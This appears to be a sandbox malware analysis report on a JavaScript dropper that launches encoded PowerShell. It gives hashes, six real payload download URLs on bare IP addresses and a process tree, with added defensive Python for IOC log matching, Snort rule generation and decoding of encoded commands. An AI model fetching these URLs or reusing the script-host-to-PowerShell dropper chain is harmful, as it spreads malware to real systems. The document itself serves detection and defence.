Analysis
max time kernel: 30s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 16/03/2023, 07:52
Static task: static1
Behavioral task: behavioral1
  Sample: gM.dhnZAf.825544279.js
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: gM.dhnZAf.825544279.js
  Resource: win10v2004-20230220-en
General
Target: gM.dhnZAf.825544279.js
Size: 58KB
MD5: e957a7e0df257710146c2b6d3faeb0a0
SHA1: f60110c9b3dc63f515020981f11fd785b6478ea2
SHA256: 93f4f64afab5b1a7f495e0a74118c86050be4eceaac92710b171be208ca6a3a1
SHA512: d0922498544d23e0ecd34fc4fbe5f081a3e7d041bfbe4d286e88e208b0c5b65bff516eeed38b531ad13d31e89d9a4829d1b8ecb046d19af34168ab4d04a46b2e
SSDEEP: 768:0Pck7kN/4F7PIWCirMSrVuRfmmKnRO6IM+G1T0Rvob5AfdbtDx00knaxe1DVIPRm:r/QDPVJRXbxNAfR7hsIp8dSC
Malware Config
Extracted
http://198.44.132.63/azoznP2HTX1.dat
http://128.254.207.26/9CJqq.dat
http://139.180.170.206/Hm6BeG.dat
http://94.131.115.19/wNRI9qF0Tqgi.dat
http://87.236.146.84/hbWBN.dat
http://206.53.48.51/VqLRtB3ecLE.dat
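All six extracted payload URLs point at bare IPv4 hosts rather than domain names, so DNS sinkholing or domain blocklists would not catch the second-stage fetch; the useful controls are URL/IP matching in proxy logs and network signatures. The following Python is an added example, not code from tria.ge or the sample: it parses the six URLs from the config above into structured IOCs, matches them against a few proxy log lines constructed for the example (not from the sandbox run), and emits classic Snort/Suricata-syntax rules for the payload paths. The log format and rule SIDs are assumptions chosen for illustration.

```python
"""Added example (not part of the tria.ge report): turn the extracted download
URLs into structured IOCs, match them against proxy log lines, and emit network
signatures. Log lines are constructed for the example, not from the sandbox run."""
from urllib.parse import urlparse
import ipaddress
import re

# The six payload URLs from the report's "Malware Config / Extracted" section.
EXTRACTED_URLS = [
    "http://198.44.132.63/azoznP2HTX1.dat",
    "http://128.254.207.26/9CJqq.dat",
    "http://139.180.170.206/Hm6BeG.dat",
    "http://94.131.115.19/wNRI9qF0Tqgi.dat",
    "http://87.236.146.84/hbWBN.dat",
    "http://206.53.48.51/VqLRtB3ecLE.dat",
]


def parse_iocs(urls):
    """Split each URL into host / path / filename; require a literal IP host."""
    iocs = []
    for url in urls:
        p = urlparse(url)
        ipaddress.ip_address(p.hostname)  # raises on hostnames; this config uses bare IPs
        iocs.append({"url": url, "host": p.hostname, "path": p.path,
                     "filename": p.path.rsplit("/", 1)[-1]})
    return iocs


# Constructed proxy access log (epoch client method url status); assumed format.
SAMPLE_LOG = """\
1678953150.123 10.0.0.7 GET http://198.44.132.63/azoznP2HTX1.dat 200
1678953151.456 10.0.0.7 GET http://example.com/index.html 200
1678953152.789 10.0.0.9 GET http://128.254.207.26/other.bin 404
1678953153.012 10.0.0.7 GET http://206.53.48.51/VqLRtB3ecLE.dat 200
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)")


def match_log(log_text, iocs):
    """Return hits: exact URL matches (high confidence) and host-only matches (medium)."""
    by_url = {i["url"]: i for i in iocs}
    hosts = {i["host"] for i in iocs}
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than crash the sweep
        url = m["url"]
        host = urlparse(url).hostname
        if url in by_url:
            hits.append({"client": m["client"], "url": url, "confidence": "high"})
        elif host in hosts:
            # Same host, different path: the config may rotate filenames.
            hits.append({"client": m["client"], "url": url, "confidence": "medium"})
    return hits


def to_snort_rules(iocs, base_sid=1000001):
    """One plaintext-HTTP rule per payload path in classic Snort/Suricata syntax (SIDs assumed)."""
    rules = []
    for n, i in enumerate(iocs):
        rules.append(
            f'alert tcp $HOME_NET any -> {i["host"]} $HTTP_PORTS '
            f'(msg:"JS dropper payload fetch {i["filename"]}"; flow:to_server,established; '
            f'content:"GET {i["path"]} HTTP"; sid:{base_sid + n}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    iocs = parse_iocs(EXTRACTED_URLS)
    for hit in match_log(SAMPLE_LOG, iocs):
        print(hit)
    print("\n".join(to_snort_rules(iocs)))
```

The host-only match is deliberately reported at lower confidence: the same distribution server may serve other filenames than the six seen here, but a shared IP alone is weaker evidence than the exact URL.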
Signatures
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  1980  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  1980  powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process      procid_target
  PID 1052 wrote to memory of 1980  1052  wscript.exe  28
  PID 1052 wrote to memory of 1980  1052  wscript.exe  28
  PID 1052 wrote to memory of 1980  1052  wscript.exe  28
Processes
1. C:\Windows\system32\wscript.exe
   wscript.exe C:\Users\Admin\AppData\Local\Temp\gM.dhnZAf.825544279.js
   PID: 1052
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
      PID: 1980
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
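The process tree is the most actionable part of this report: a Windows Script Host process (wscript.exe, PID 1052) launching powershell.exe (PID 1980) with an -encodedcommand argument. The WriteProcessMemory IoCs above are the parent writing into the freshly created child during process creation, which every CreateProcess does, so the signal is the parent/child pairing and the encoded argument, not the memory write itself. The following Python is an added example, not tria.ge's code or the sample's: it decodes a PowerShell -EncodedCommand value (base64 over UTF-16LE) and flags the script-host-to-PowerShell chain over Sysmon-style process-creation events constructed for the example. Because the report elides the real encoded command, the encoded value in the events is a constructed placeholder; the event field names and the benign third event are assumptions.

```python
"""Added example (not part of the tria.ge report): decode a PowerShell
-EncodedCommand argument and flag the wscript.exe -> powershell.exe chain the
report shows, over constructed process-creation events."""
import base64
import re


def encode_powershell_command(script: str) -> str:
    """Produce what powershell.exe -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Inverse of the above; tolerates surrounding quotes and stripped '=' padding."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def _is_encoded_flag(token: str) -> bool:
    # powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand.
    s = token.lstrip("-/").lower()
    return s in ("e", "ec") or (len(s) >= 3 and "encodedcommand".startswith(s))


def extract_encoded_command(cmdline: str):
    """Return the base64 argument following an -EncodedCommand style flag, else None."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)  # keep quoted Windows paths as one token
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            return tokens[i + 1].strip('"')
    return None


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def flag_script_host_to_powershell(events):
    """Flag PowerShell whose parent is a Windows Script Host; decode -EncodedCommand if present."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        enc = extract_encoded_command(e["cmdline"])
        hits.append({
            "pid": e["pid"],
            "parent": _basename(parent["image"]),
            "decoded": decode_encoded_command(enc) if enc else None,
        })
    return hits


# Constructed stand-in for the report's elided encoded command; the real payload is not on the page.
SAMPLE_SCRIPT = "Write-Output 'constructed placeholder'"
SAMPLE_ENCODED = encode_powershell_command(SAMPLE_SCRIPT)

# Constructed Sysmon-style process-creation events mirroring the report's PIDs (1052 -> 1980).
EVENTS = [
    {"pid": 1052, "ppid": 600,
     "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\gM.dhnZAf.825544279.js"},
    {"pid": 1980, "ppid": 1052,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                f'-encodedcommand "{SAMPLE_ENCODED}"'},
    {"pid": 2200, "ppid": 900,  # assumed benign: no script-host parent, no encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Date"'},
]

if __name__ == "__main__":
    for hit in flag_script_host_to_powershell(EVENTS):
        print(hit)
```

Decoding the argument matters because the encoded form hides the download URLs and the execution logic from plain string matching; once decoded, the same URL IOCs extracted in the Malware Config section can be searched for directly in the script text.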